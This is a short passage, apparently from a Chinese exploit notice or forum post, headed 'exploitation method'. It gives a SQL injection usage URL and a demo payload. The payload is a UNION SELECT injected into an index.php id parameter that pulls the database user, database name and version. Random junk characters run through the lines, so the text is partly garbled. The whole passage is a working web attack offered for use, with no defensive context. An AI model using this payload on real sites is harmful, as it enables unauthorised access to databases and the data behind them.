利用方法:
2 H" l2 ^& v% z5 Y http://www.xxx.com/index.php?id=[SQL]
+ ?* [# t( e7 @; k% |* _' | } Demo:
* D9 r" m' i0 |7 r7 f4 n% K http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |